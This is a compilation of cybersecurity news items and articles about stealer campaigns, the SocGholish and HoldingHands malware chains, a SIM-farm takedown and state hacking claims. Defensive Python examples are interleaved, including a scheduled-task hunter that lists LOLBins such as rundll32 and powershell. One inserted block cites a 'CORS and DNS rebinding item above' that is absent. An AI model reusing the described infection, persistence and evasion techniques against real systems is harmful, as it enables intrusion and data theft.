    • Meta’s New Collage Feature May Use Photos in Phone’s Camera Roll — Meta is officially rolling out a new opt-in feature to Facebook users in the U.S. and Canada to suggest the best photos and videos from users’ camera roll and create collages and edits. “With your permission and the help of AI, our new feature enables Facebook to automatically surface hidden gems – those memorable moments that get lost among screenshots, receipts, and random snaps – and edit them to save or share,” the company said. The feature was first tested back in late June 2025. The social media company emphasized that the suggestions are private and that it does not use media obtained from users’ devices via the camera roll to train its models, unless users opt to edit the media with its AI tools or publish those suggestions to Facebook. Users who wish to opt out of the feature can do so by navigating to Settings and Privacy > Settings > Preferences > Camera Roll Sharing Suggestions.
    • Fake Homebrew, TradingView, LogMeIn Sites Serve Stealer Malware Targeting Macs — Threat actors are employing social engineering tactics to trick users into visiting fake websites impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn, where they are instructed to copy and run a malicious command in the Terminal app as part of ClickFix-style attacks, resulting in the deployment of stealer malware such as Atomic Stealer and Odyssey Stealer. “More than 85 phishing domains were identified, connected through shared SSL certificates, payload servers, and reused infrastructure,” Hunt.io said. “The findings suggest a coordinated and ongoing campaign in which operators continuously adapt their infrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.” It’s suspected that users are driven to these websites via sponsored ads on search engines like Bing and Google.
    • Dutch Data Protection Watchdog Fines Experian $3.2 Million for Privacy Violations — The Dutch Data Protection Authority (DPA) imposed a fine of €2.7 million ($3.2 million) on Experian Netherlands for collecting data in contravention of the E.U. General Data Protection Regulation (GDPR). The DPA said the consumer credit reporting company gathered information on people from both public and non-public sources and failed to make it clear why the collection of certain data was necessary. In addition to the penalty, Experian is expected to delete the database of personal data by the end of the year. The company has also ceased its operations in the country. “Until January 1, 2025, Experian provided credit assessments about individuals to its clients,” the DPA said. “To do this, the company collected data such as negative payment behavior, outstanding debts, or bankruptcies. The AP found that Experian violated the law by unlawfully using personal data.”
    • Threat Actors Send Fake Password Manager Breach Alerts — Bad actors are sending phishing alerts claiming that recipients’ 1Password and LastPass accounts have been compromised in order to trick users into providing their passwords and hijack their accounts. In response to the attack, LastPass said it has not been hacked and that the messages are an attempt on the part of the attackers to generate a false sense of urgency. In some cases spotted by Bleeping Computer, the activity has also been found to urge recipients to install a more secure version of the password manager, resulting in the deployment of a legitimate remote access tool called Syncro. The software vendor has since moved to shut down the malicious accounts to prevent further installs.
    • SocGholish MaaS Detailed — LevelBlue has published an analysis of a threat activity cluster known as SocGholish (aka FakeUpdates), which has been active since 2017, leveraging fake web browser update prompts on compromised websites as a lure to distribute malware. Victims are typically routed through Traffic Distribution Systems (TDS) like Keitaro and Parrot TDS to filter users based on specific factors such as geography, browser type, or system configuration, ensuring that only the intended targets are exposed to the payload. It’s offered as malware-as-a-service (MaaS) by a financially motivated cybercrime group called TA569. SocGholish stands out for its ability to turn legitimate websites into large-scale distribution platforms for malware. Acting as an initial access broker (IAB), its operations profit from follow-on compromises by other actors. “Once executed, its payloads range from loaders and stealers to ransomware, allowing for extensive follow-up exploitation,” LevelBlue said. “This combination of broad reach, simple delivery mechanisms, and flexible use by multiple groups makes SocGholish a persistent and dangerous threat across industries and regions.” One of its primary users is Evil Corp, with the malware also used to deliver RansomHub in early 2025.
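    The CORS and DNS rebinding item above describes the attack from the browser’s side; the standard service-side mitigation is to answer only for Host headers the service actually owns (after a rebinding, the browser still sends the attacker’s hostname in Host), and to emit Access-Control-Allow-Origin only for an explicit allowlist instead of reflecting whatever Origin arrives. The following is an added example written for this page, not code from CERT/CC or any browser vendor; the host and origin allowlists, the `handle` router and its request dict are constructed for illustration.

```python
"""Service-side guards against DNS rebinding and permissive CORS (added example).

Two independent checks: a Host-header allowlist, which is what stops a rebound
hostname from reaching a service bound to localhost or an internal address, and
an Origin allowlist for CORS, so the service never reflects an arbitrary origin.
The allowlisted names are constructed placeholders.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]", "internal.example"}   # constructed
ALLOWED_ORIGINS = {"https://app.internal.example"}                         # constructed


def host_is_expected(host_header, allowed_hosts=ALLOWED_HOSTS):
    """True only if the Host header (port stripped, case-folded) names a host we serve."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):                 # IPv6 literal: keep the brackets, drop ":port"
        host = host.split("]", 1)[0] + "]"
    else:
        host = host.split(":", 1)[0]
    return host in allowed_hosts


def cors_headers_for(origin, allowed_origins=ALLOWED_ORIGINS):
    """CORS response headers for an allowlisted Origin, or {} for any other origin.
    The Origin is normalised (scheme://host[:port], lower-cased) and never reflected verbatim."""
    if not origin:
        return {}
    parts = urlsplit(origin)
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    if normalized not in allowed_origins:
        return {}
    return {
        "Access-Control-Allow-Origin": normalized,
        "Vary": "Origin",                          # caches must key on Origin
        "Access-Control-Allow-Methods": "GET, POST",
        "Access-Control-Allow-Headers": "Content-Type",
    }


def handle(request):
    """Minimal router over a request dict {method, headers}; returns (status, response headers).
    A request for an unexpected Host is refused before any CORS decision is made."""
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    if not host_is_expected(headers.get("host")):
        return 421, {}                            # 421 Misdirected Request
    cors = cors_headers_for(headers.get("origin"))
    if request.get("method") == "OPTIONS":        # preflight: succeed only for allowlisted origins
        return (204, cors) if cors else (403, {})
    return 200, cors


if __name__ == "__main__":
    # Constructed requests: a rebound hostname, a valid preflight, and a plain same-host GET.
    print(handle({"method": "GET", "headers": {"Host": "attacker.example:8080"}}))
    print(handle({"method": "OPTIONS", "headers": {"Host": "localhost:8080",
                                                   "Origin": "https://app.internal.example"}}))
    print(handle({"method": "GET", "headers": {"Host": "localhost:8080"}}))
```

    Returning 421 for an unknown Host is deliberate: it gives the rebound request no content at all, which is the property a permissive CORS policy would otherwise be used to undermine.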

    🎥 Cybersecurity Webinars

    • The Practical Framework to Govern AI Agents Without Slowing Innovation – AI is changing everything fast — but for most security teams, it still feels like a fight just to keep up. The goal isn’t to slow innovation with more controls; it’s to make those controls work for the business. By building security into AI from the start, you can turn what used to be a bottleneck into a real accelerator for growth and trust.
    • The Future of AI in GRC: Turning Risk Into a Compliance Advantage – AI is changing how companies manage risk and compliance — fast. It brings big opportunities but also new challenges. This webinar shows you how to use AI safely and effectively in GRC, avoid common mistakes, and turn complex rules into a real business advantage.
    • Workflow Clarity: How to Blend AI and Human Effort for Real Results – Too many teams are rushing to “add AI” without a plan — and ending up with messy, unreliable workflows. Join us to learn a clearer approach: how to use AI thoughtfully, simplify automation, and build systems that scale securely.

    🔧 Cybersecurity Tools

    • Beelzebub – It turns honeypot deployment into a powerful, low-code experience. It uses AI to simulate real systems, helping security teams detect attacks, track emerging threats, and share insights through a global threat intelligence network.
    • NetworkHound – It maps your Active Directory network from the inside out. It discovers every device — domain-joined or shadow-IT — validates SMB and web services, and builds a full BloodHound-compatible graph so you can see and secure your environment clearly.

    Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.

    🔒 Tip of the Week

    Most Cloud Breaches Aren’t Hacks — They’re Misconfigurations. Here’s How to Fix Them — Cloud storage buckets like AWS S3, Azure Blob, and Google Cloud Storage make data sharing easy — but one wrong setting can expose everything. Most data leaks happen not because of hacking, but because someone left a public bucket, skipped encryption, or used a test bucket that never got locked down. Cloud platforms give you flexibility, not guaranteed safety, so you need to check and control access yourself.

    Misconfigurations usually happen when permissions are too broad, encryption is disabled, or visibility is lost across multiple clouds. Doing manual checks doesn’t scale — especially if you manage data in AWS, Azure, and GCP. The fix is using tools that automatically find, report, and even fix unsafe settings before they cause damage.

    ScoutSuite is a strong starting point for cross-cloud visibility. It scans AWS, Azure, and GCP for open buckets, weak IAM roles, and missing encryption, then creates an easy-to-read HTML report. Prowler goes deeper into AWS, checking S3 settings against CIS and AWS benchmarks to catch bad ACLs or unencrypted buckets.

    For ongoing control, Cloud Custodian lets you write simple policies that automatically enforce rules — for example, forcing all new buckets to use encryption. And CloudQuery can turn your cloud setup into a searchable database, so you can monitor changes, track compliance, and visualize risks in one place.

    The best approach is to combine them: run ScoutSuite or Prowler weekly to find issues, and let Cloud Custodian handle automatic fixes. Even a few hours spent setting these up can stop the kind of data leaks that make headlines. Always assume every bucket is public until proven otherwise — and secure it like it is.
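    To make the three settings the tip keeps returning to concrete (a public bucket, a missing encryption default, and an overly broad policy or ACL), here is an added example written for this page; it is not code from the article or from ScoutSuite, Prowler, Cloud Custodian or CloudQuery. Each check takes a dict shaped like the corresponding boto3 response (get_public_access_block, get_bucket_acl, get_bucket_policy, get_bucket_encryption), so the logic runs offline on the constructed sample buckets below and a caller with credentials can feed it live responses; the bucket names and IDs are placeholders.

```python
"""Offline checks for common S3 bucket misconfigurations (added example)."""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GRANTEES = {ALL_USERS, AUTH_USERS}      # ACL grantees that mean "anyone"
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def public_access_block_gaps(pab):
    """Names of the Public Access Block settings that are off; all four if none is configured."""
    return list(PAB_KEYS) if pab is None else [k for k in PAB_KEYS if not pab.get(k, False)]


def public_acl_grants(acl):
    """(grantee URI, permission) pairs that grant access to everyone or to any AWS account."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEES:
            hits.append((grantee["URI"], grant.get("Permission")))
    return hits


def _wildcard_principal(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy_json):
    """(Sid, has_condition) for each Allow statement whose Principal is a wildcard.
    A Condition may narrow such a statement, so it is reported for review rather than ignored."""
    if not policy_json:
        return []
    stmts = json.loads(policy_json).get("Statement", [])
    stmts = [stmts] if isinstance(stmts, dict) else stmts
    return [(s.get("Sid", f"#{i}"), "Condition" in s)
            for i, s in enumerate(stmts)
            if s.get("Effect") == "Allow" and _wildcard_principal(s.get("Principal"))]


def default_encryption_algorithm(enc):
    """The default SSE algorithm, or None when no default encryption rule is configured."""
    for rule in (enc or {}).get("ServerSideEncryptionConfiguration", {}).get("Rules", []):
        algo = rule.get("ApplyServerSideEncryptionByDefault", {}).get("SSEAlgorithm")
        if algo:
            return algo
    return None


def evaluate_bucket(name, pab, acl, policy_json, enc):
    """Run every check for one bucket and return a list of human-readable findings."""
    findings = []
    gaps = public_access_block_gaps(pab)
    if gaps:
        findings.append(f"{name}: Public Access Block incomplete (off: {', '.join(gaps)})")
    for uri, perm in public_acl_grants(acl):
        findings.append(f"{name}: ACL grants {perm} to {uri.rsplit('/', 1)[-1]}")
    for sid, conditioned in public_policy_statements(policy_json):
        note = " (narrowed by a Condition; review it)" if conditioned else ""
        findings.append(f"{name}: policy statement {sid} allows Principal '*'{note}")
    if default_encryption_algorithm(enc) is None:
        findings.append(f"{name}: no default server-side encryption configured")
    return findings


# Constructed sample responses (no real buckets): one wide open, one locked down.
OPEN_BUCKET = dict(
    name="example-open-bucket", pab=None, enc=None,
    acl={"Grants": [{"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]},
    policy_json=json.dumps({"Version": "2012-10-17", "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-open-bucket/*"}]}),
)
LOCKED_BUCKET = dict(
    name="example-locked-bucket", policy_json=None,
    pab={k: True for k in PAB_KEYS},
    acl={"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"}]},
    enc={"ServerSideEncryptionConfiguration": {"Rules": [
        {"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "aws:kms"}}]}},
)

if __name__ == "__main__":
    for bucket in (OPEN_BUCKET, LOCKED_BUCKET):
        print("\n".join(evaluate_bucket(**bucket) or [f"{bucket['name']}: no findings"]))
```

    The wildcard-principal check reports statements that carry a Condition separately instead of dropping them, because a condition such as a VPC or source-IP restriction can make a `Principal: "*"` statement acceptable, and that is a judgement a reviewer has to make rather than a scanner.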

    Conclusion

    The truth is, no tool or patch will ever make us fully secure. What matters most is awareness — knowing what’s normal, what’s changing, and how attackers think. Every alert, log, or minor anomaly is a clue. Keep connecting those dots before someone else does.


    Source: thehackernews.com…

  • MSS Claims NSA Used 42 Cyber Tools in Multi-Stage Attack on Beijing Time Systems


    Oct 20, 2025Ravie LakshmananCyber Espionage / National Security

    China on Sunday accused the U.S. National Security Agency (NSA) of carrying out a “premeditated” cyber attack targeting the National Time Service Center (NTSC), as it described the U.S. as a “hacker empire” and the “greatest source of chaos in cyberspace.”

    The Ministry of State Security (MSS), in a WeChat post, said it uncovered “irrefutable evidence” of the agency’s involvement in the intrusion that dated back to March 25, 2022. The attack was ultimately foiled, it added.

    Established in 1966 under the jurisdiction of the Chinese Academy of Sciences (CAS), NTSC is responsible for generating, maintaining, and transmitting the national standard of time (Beijing Time).

    “Any cyberattack damaging these facilities would jeopardize the secure and stable operation of ‘Beijing Time,’ triggering severe consequences such as network communication failures, financial system disruptions, power supply interruptions, transportation paralysis, and space launch failures,” the MSS said.


    “This operation thwarted U.S. attempts to steal secrets and conduct sabotage through cyberattacks, fully safeguarding the security of ‘Beijing Time.’”

    According to details shared in the WeChat post, the NSA is said to have exploited security flaws in an unnamed foreign brand’s SMS service to stealthily compromise mobile devices belonging to several staff members at NTSC, resulting in the theft of sensitive data. It did not disclose the nature of the vulnerabilities used to conduct the attack.

    On April 18 the following year, the MSS claimed that the agency repeatedly used stolen login credentials to break into the computers at the center to probe its infrastructure, followed by deploying a new “cyber warfare platform” between August 2023 and June 2024.

    The platform activated what it described as 42 specialized tools to mount high-intensity attacks aimed at multiple internal network systems of NTSC. The attacks also involved attempts to conduct lateral movement to a high-precision ground-based timing system with the alleged goal of disrupting it.

    The attacks, launched between late night and early morning Beijing time, involved the use of virtual private servers (VPSes) based in the U.S., Europe, and Asia to route malicious traffic and conceal its origins.

    “They employed tactics such as forging digital certificates to bypass antivirus software and employed high-strength encryption algorithms to thoroughly erase attack traces, leaving no stone unturned in their efforts to carry out cyberattacks and infiltration activities,” the MSS said.


    The ministry said China’s national security agencies neutralized the attack and implemented additional security measures. It also accused the U.S. of launching persistent cyber attacks against China, Southeast Asia, Europe, and South America, adding that it leverages technological footholds in the Philippines, Japan, and China’s Taiwan Province to launch these activities and obscure its own involvement.

    “Simultaneously, the U.S. has resorted to crying wolf, repeatedly hyping the ‘China cyber threat theory,’ coercing other countries to amplify so-called ‘Chinese hacking incidents,’ sanctioning Chinese enterprises, and prosecuting Chinese citizens – all in a futile attempt to confuse the public and distort the truth,” it alleged.


    Source: thehackernews.com…

  • Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide


    Oct 19, 2025Ravie LakshmananSIM Swapping / Cryptocurrency

    Europol on Friday announced the disruption of a sophisticated cybercrime-as-a-service (CaaS) platform that operated a SIM farm and enabled its customers to carry out a broad spectrum of crimes ranging from phishing to investment fraud.

    The coordinated law enforcement effort, dubbed Operation SIMCARTEL, saw 26 searches carried out, resulting in the arrest of seven suspects and the seizure of 1,200 SIM box devices, which contained 40,000 active SIM cards. Five of those detained are Latvian nationals.

    In addition, five servers were dismantled and two websites (gogetsms[.]com and apisim[.]com) advertising the service were taken over on October 10, 2025, to display a seizure banner. Separately, four luxury vehicles were confiscated, and €431,000 ($502,000) in suspects’ bank accounts and €266,000 ($310,000) in their cryptocurrency accounts were frozen.


    The countries that participated in the operation comprised authorities from Austria, Estonia, Finland, and Latvia, in collaboration with Europol and Eurojust.

    According to Europol, the criminal network has been attributed to more than 1,700 individual cyber fraud cases in Austria and 1,500 in Latvia, leading to losses totaling around €4.5 million ($5.25 million) and €420,000 ($489,000) in the two countries, respectively.

    “The criminal network and its infrastructure were technically highly sophisticated and enabled perpetrators around the world to use this SIM-box service to conduct a wide range of telecommunications-related cybercrimes, as well as other crimes,” the agency said.

    The infrastructure offered telephone numbers registered to people from over 80 countries for use in criminal activities, including setting up fake accounts on social media and communication platforms with the primary goal of obscuring their original identity and location. In all, the service enabled the creation of more than 49 million online accounts.

    These accounts were then used to conduct phishing and smishing attacks and carry out financial fraud by tricking victims into investing their funds in bogus trading schemes. Another scheme involved contacting victims on WhatsApp while posing as their daughter or son, claiming to have a new number and asking them to transfer money in the four-figure range for an emergency.

    Some of the other offenses that were made possible via the platform included extortion, migrant smuggling, and the distribution of child sexual abuse material (CSAM).

    According to snapshots captured on the Internet Archive, GoGetSMS was marketed as a way to get “fast and secure temporary phone numbers,” with more than 10 million numbers available and the ability to receive verification codes from over 160 online services.

    On its website, GoGetSMS also offered the ability to monetize existing SIM cards by turning them into “powerful assets for generating passive income” using its “specialized software,” allowing card owners to earn revenue for every SMS message sent to them.


    On review website Trustpilot, paid users have complained of facing issues getting hold of a temporary number through GoGetSMS, with one user claiming that they paid for a U.S. number on the platform and did not get a working number in return. “Tried multiple times, wasted both time and money. Support is completely unresponsive – no help, no refund, nothing,” the user added.

    The Latvian State Police, in a coordinated announcement, said the platform was designed for anonymous communication and payments, impacting 3,200 people in various countries.


    Source: thehackernews.com…

  • New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs


    Oct 18, 2025Ravie LakshmananThreat Intelligence / Cybercrime

    Cybersecurity researchers have shed light on a new campaign that has likely targeted the Russian automobile and e-commerce sectors with a previously undocumented .NET malware dubbed CAPI Backdoor.

    According to Seqrite Labs, the attack chain involves distributing phishing emails containing a ZIP archive as a way to trigger the infection. The cybersecurity company’s analysis is based on the ZIP artifact that was uploaded to the VirusTotal platform on October 3, 2025.

    Present within the archive are a decoy Russian-language document that purports to be a notification related to income tax legislation and a Windows shortcut (LNK) file.

    The LNK file, which has the same name as the ZIP archive (i.e., “Перерасчет заработной платы 01.10.2025”), is responsible for the execution of the .NET implant (“adobe.dll”) using a legitimate Microsoft binary named “rundll32.exe,” a living-off-the-land (LotL) technique known to be adopted by threat actors.


    The backdoor, Seqrite noted, comes with functions to check if it’s running with administrator-level privileges, gather a list of installed antivirus products, and open the decoy document as a ruse, while it stealthily connects to a remote server (“91.223.75[.]96”) to receive further commands for execution.

    The commands allow CAPI Backdoor to steal data from web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox; take screenshots; collect system information; enumerate folder contents; and exfiltrate the results back to the server.

    It also attempts to run a long list of checks to determine whether it’s running on a legitimate host or in a virtual machine, and makes use of two methods to establish persistence: setting up a scheduled task and creating an LNK file in the Windows Startup folder that automatically launches the backdoor DLL copied to the Windows Roaming folder.

    Seqrite’s assessment that the threat actor is targeting the Russian automobile sector is down to the fact that one of the domains linked to the campaign is named carprlce[.]ru, which appears to impersonate the legitimate “carprice[.]ru.”

    “The malicious payload is a .NET DLL that functions as a stealer and establishes persistence for future malicious activities,” researchers Priya Patel and Subhajeet Singha said.


    Source: thehackernews.com…

  • Silver Fox Expands Winos 4.0 Attacks to Japan and Malaysia via HoldingHands RAT


    The threat actors behind a malware family known as Winos 4.0 (aka ValleyRAT) have expanded their targeting footprint from China and Taiwan to target Japan and Malaysia with another remote access trojan (RAT) tracked as HoldingHands RAT (aka Gh0stBins).

    “The campaign relied on phishing emails with PDFs that contained embedded malicious links,” Pei Han Liao, researcher with Fortinet’s FortiGuard Labs, said in a report shared with The Hacker News. “These files masqueraded as official documents from the Ministry of Finance and included numerous links in addition to the one that delivered Winos 4.0.”

    Winos 4.0 is a malware family that’s often spread via phishing and search engine optimization (SEO) poisoning, directing unsuspecting users to fake websites masquerading as popular software like Google Chrome, Telegram, Youdao, Sogou AI, WPS Office, and DeepSeek, among others.

    The use of Winos 4.0 is primarily linked to an “aggressive” Chinese cybercrime group known as Silver Fox, which is also tracked as SwimSnake, The Great Thief of Valley (or Valley Thief), UTG-Q-1000, and Void Arachne.

    Last month, Check Point attributed the threat actor to the abuse of a previously unknown vulnerable driver associated with WatchDog Anti-malware as part of a Bring Your Own Vulnerable Driver (BYOVD) attack aimed at disabling security software installed on compromised hosts.

    Then weeks later, Fortinet shed light on another campaign that took place in August 2025, leveraging SEO poisoning to distribute HiddenGh0st and modules associated with the Winos malware.

    Silver Fox’s targeting of Taiwan and Japan with HoldingHands RAT was also documented by the cybersecurity company and a security researcher named somedieyoungZZ back in June, with the attackers employing phishing emails containing booby-trapped PDF documents to activate a multi-stage infection that ultimately deploys the trojan.


    It’s worth noting at this stage that both Winos 4.0 and HoldingHands RAT are inspired by another RAT malware referred to as Gh0st RAT, which had its source code leaked in 2008 and has since been widely adopted by various Chinese hacking groups.

    Fortinet said it identified PDF documents posing as a tax regulation draft for Taiwan that included a URL to a Japanese language web page (“twsww[.]xin/download[.]html”), from where victims are prompted to download a ZIP archive responsible for delivering HoldingHands RAT.

    Further investigation has uncovered attacks targeting China that have utilized taxation-themed Microsoft Excel documents as lures, some dating back to March 2024, to distribute Winos. Recent phishing campaigns, however, have shifted their focus to Malaysia, using fake landing pages to deceive recipients into downloading HoldingHands RAT.

    The starting point is an executable claiming to be an excise audit document. It’s used to sideload a malicious DLL, which functions as a shellcode loader for “sw.dat,” a payload that’s designed to run anti-virtual machine (VM) checks, enumerate active processes against a list of security products from Avast, Norton, and Kaspersky and terminate any it finds, escalate privileges, and terminate the Task Scheduler.

    It also drops several other files in the system’s C:\Windows\System32 folder –

    • svchost.ini, which contains the Relative Virtual Address (RVA) of the VirtualAlloc function
    • TimeBrokerClient.dll, the legitimate TimeBrokerClient.dll renamed as BrokerClientCallback.dll
    • msvchost.dat, which contains the encrypted shellcode
    • system.dat, which contains the encrypted payload
    • wkscli.dll, an unused DLL

    “The Task Scheduler is a Windows service hosted by svchost.exe that allows users to control when specific operations or processes are run,” Fortinet said. “The Task Scheduler’s recovery setting is configured to restart the service one minute after it fails by default.”

    “When the Task Scheduler is restarted, svchost.exe is executed and loads the malicious TimeBrokerClient.dll. This trigger mechanism does not require the direct launch of any process, making behavior-based detection more challenging.”

    The primary function of “TimeBrokerClient.dll” is to allocate memory for the encrypted shellcode within “msvchost.dat” by invoking the VirtualAlloc() function using the RVA value specified in “svchost.ini.” In the next stage, “msvchost.dat” decrypts the payload stored in “system.dat” to retrieve the HoldingHands payload.

    HoldingHands is equipped to connect to a remote server, send host information to it, send a heartbeat signal every 60 seconds to maintain the connection, and receive and process attacker-issued commands on the infected system. These commands allow the malware to capture sensitive information, run arbitrary commands, and download additional payloads.

    A new addition is a command that makes it possible to update the command-and-control (C2) address used for communications via a Windows Registry entry.

    Operation Silk Lure Targets China with ValleyRAT

    The development comes as Seqrite Labs detailed an ongoing email-based phishing campaign that has leveraged C2 infrastructure hosted in the U.S., targeting Chinese companies in the fintech, cryptocurrency, and trading platform sectors to ultimately deliver Winos 4.0. The campaign has been codenamed Operation Silk Lure, owing to its China-related footprint.

    “The adversaries craft highly targeted emails impersonating job seekers and send them to HR departments and technical hiring teams within Chinese firms,” researchers Dixit Panchal, Soumen Burma, and Kartik Jivani said.

    “These emails often contain malicious .LNK (Windows shortcut) files embedded within seemingly legitimate résumés or portfolio documents. When executed, these .LNK files act as droppers, initiating the execution of payloads that facilitate initial compromise.”

    The LNK file, when launched, runs PowerShell code to download a decoy PDF resume, while stealthily dropping three additional payloads to the “C:\Users\<user>\AppData\Roaming\Security” location and executing them. The PDF resumes are localized and tailored for Chinese targets so as to increase the likelihood of success of the social engineering attack.


    The payloads dropped are as follows –

    • CreateHiddenTask.vbs, which creates a scheduled task to launch “keytool.exe” every day at 8:00 a.m.
    • keytool.exe, which uses DLL side-loading to load jli.dll
    • jli.dll, a malicious DLL that launches the Winos 4.0 malware encrypted and embedded within keytool.exe
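    Both the CAPI Backdoor item above (a scheduled task plus a DLL copied to the Roaming folder) and Operation Silk Lure (a daily 8:00 a.m. task starting a side-loading host from AppData\Roaming\Security) share a trait a defender can hunt for: a scheduled task whose action runs from a user-writable directory, or hands a system binary such as rundll32.exe a payload from one. The following is an added example written for this page, not code from Seqrite. It parses the Task Scheduler XML format (what `schtasks /query /xml` exports, or the files under C:\Windows\System32\Tasks) and applies those two heuristics; the task definitions, user names and file names it is run on are constructed fixtures, and the LOLBin list and path patterns are my own starting set rather than anything from the report.

```python
"""Flag scheduled tasks whose action runs from, or loads from, a user-writable path (added example)."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}   # Task Scheduler XML namespace

# Directories an unprivileged user can write to; services and updaters rarely live here.
USER_WRITABLE = re.compile(
    r"(?:^|\\)(?:Users\\[^\\]+\\AppData\\(?:Roaming|Local)|ProgramData|Windows\\Temp|Temp)\\",
    re.IGNORECASE,
)
# Signed system binaries commonly used to run attacker code without a dropped EXE (assumed set).
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def _expand(path):
    """Resolve the environment-variable forms that appear in task definitions (placeholder user)."""
    return (path.replace("%APPDATA%", r"C:\Users\user\AppData\Roaming")
                .replace("%LOCALAPPDATA%", r"C:\Users\user\AppData\Local")
                .replace("%USERPROFILE%", r"C:\Users\user"))


def analyze_task(xml_text):
    """Parse one task and return its command, arguments, trigger types and why it looks suspicious."""
    root = ET.fromstring(xml_text)
    exec_node = root.find(".//t:Actions/t:Exec", NS)
    command = args = ""
    if exec_node is not None:
        command = exec_node.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
    trig = root.find("t:Triggers", NS)
    triggers = [c.tag.split("}")[-1] for c in (list(trig) if trig is not None else [])]
    reasons = []
    if USER_WRITABLE.search(_expand(command)):
        reasons.append("command runs from a user-writable directory")
    exe = command.rsplit("\\", 1)[-1].lower()
    if exe in LOLBINS and USER_WRITABLE.search(_expand(args)):
        reasons.append(f"{exe} is handed a payload from a user-writable directory")
    return {"command": command, "arguments": args, "triggers": triggers, "reasons": reasons}


def task_xml(command, arguments="", trigger="<LogonTrigger/>"):
    """Build a minimal Task Scheduler document; a fixture helper for the constructed samples."""
    return (f'<Task version="1.2" xmlns="{NS["t"]}"><Triggers>{trigger}</Triggers>'
            f'<Actions Context="Author"><Exec><Command>{command}</Command>'
            f'<Arguments>{arguments}</Arguments></Exec></Actions></Task>')


# Constructed samples (not from the report): a daily task starting a host from Roaming,
# a LOLBin task loading a DLL from %APPDATA%, and a benign vendor updater.
SUSPICIOUS_TASK = task_xml(
    r"C:\Users\alice\AppData\Roaming\Security\keytool.exe",
    trigger="<CalendarTrigger><StartBoundary>2025-10-01T08:00:00</StartBoundary>"
            "<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>")
LOLBIN_TASK = task_xml(r"C:\Windows\System32\rundll32.exe", r"%APPDATA%\updater\helper.dll,Start")
BENIGN_TASK = task_xml(r"C:\Program Files\Vendor\updater.exe")

if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASK, LOLBIN_TASK, BENIGN_TASK):
        result = analyze_task(sample)
        print(result["command"], result["triggers"], result["reasons"] or "ok")
```

    On a real host the same function can be pointed at each file under C:\Windows\System32\Tasks; the path heuristic is deliberately broad, so treat a hit as a review queue entry, not a verdict.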

    “The deployed malware establishes persistence within the compromised system and initiates various reconnaissance operations,” the researchers said. “These include capturing screenshots, harvesting clipboard contents, and exfiltrating critical system metadata.”

    The trojan also comes with various techniques to evade detection, including attempting to uninstall detected antivirus products and terminating network connections associated with security programs such as Kingsoft Antivirus, Huorong, or 360 Total Security to interfere with their regular functions.

    “This exfiltrated information significantly elevates the risk of advanced cyber espionage, identity theft, and credential compromise, thereby posing a serious threat to both organizational infrastructure and individual privacy,” the researchers added.


    Source: thehackernews.com…

  • North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware


    The North Korean threat actor linked to the Contagious Interview campaign has been observed merging some of the functionality of two of its malware programs, indicating that the hacking group is actively refining its toolset.

    That’s according to new findings from Cisco Talos, which said recent campaigns by the group show the functionality of BeaverTail and OtterCookie converging more than ever, even as the latter has gained a new module for keylogging and taking screenshots.

    The activity is attributed to a threat cluster that’s tracked by the cybersecurity community under the monikers CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, PurpleBravo, Tenacious Pungsan, UNC5342, and Void Dokkaebi.

    The development comes as Google Threat Intelligence Group (GTIG) and Mandiant revealed the threat actor’s use of a stealthy technique known as EtherHiding to fetch next-stage payloads from the BNB Smart Chain (BSC) or Ethereum blockchains, essentially turning decentralized infrastructure into a resilient command-and-control (C2) server. It represents the first documented case of a nation-state actor utilizing the method that has been otherwise adopted by cybercrime groups.

    Contagious Interview refers to an elaborate recruitment scam that began sometime around late 2022, with the North Korean threat actors impersonating hiring organizations to target job seekers and deceiving them into installing information-stealing malware as part of a supposed technical assessment or coding task, resulting in the theft of sensitive data and cryptocurrency.


    In recent months, the campaign has undergone several shifts, including leveraging ClickFix social engineering techniques for delivering malware strains such as GolangGhost, PylangGhost, TsunamiKit, Tropidoor, and AkdoorTea. Central to the attacks, however, are malware families known as BeaverTail, OtterCookie, and InvisibleFerret.

    BeaverTail and OtterCookie are separate but complementary malware tools, with the latter first spotted in real-world attacks in September 2024. Unlike BeaverTail, which functions as an information stealer and downloader, initial iterations of OtterCookie were designed to contact a remote server and fetch commands to be executed on the compromised host.

